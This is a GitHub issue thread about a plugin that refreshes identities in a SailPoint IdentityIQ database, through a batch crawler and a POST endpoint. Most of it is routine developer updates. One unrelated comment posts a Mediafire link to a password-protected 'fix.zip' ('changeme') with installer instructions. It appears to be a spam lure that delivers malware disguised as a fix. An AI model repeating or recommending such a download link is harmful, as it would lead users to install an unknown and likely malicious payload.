### ISSUE TITLE
Plugin - Automate refresh tasks

### ISSUE THREAD

**Issue by hhjfdkl** [DustinYansberg/ProjectThree-BackEnd#43]
Create a plugin that will automate the various refresh tasks for SP admin

Specific features will be added soon.

**Comment by hhjfdkl** [comment]
Draft is complete. 
**Two main features**
1. A database crawler : Automated task execution that slowly refreshes identities in the iiq database (10 at a time by default, refresh frequency is dependent on how many records are being refreshed at a time - giving 2 seconds per record)

2. An API endpoint to refresh individual identities : a POST API call can be made with an identity's ID to have that particular identity refreshed

These features both utilize the "needs_refresh" column in the spt_identity table in the identityiq database.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hhjfdkl** [comment]
Technically is finished. Will add more things to the plugin (like a UI) next
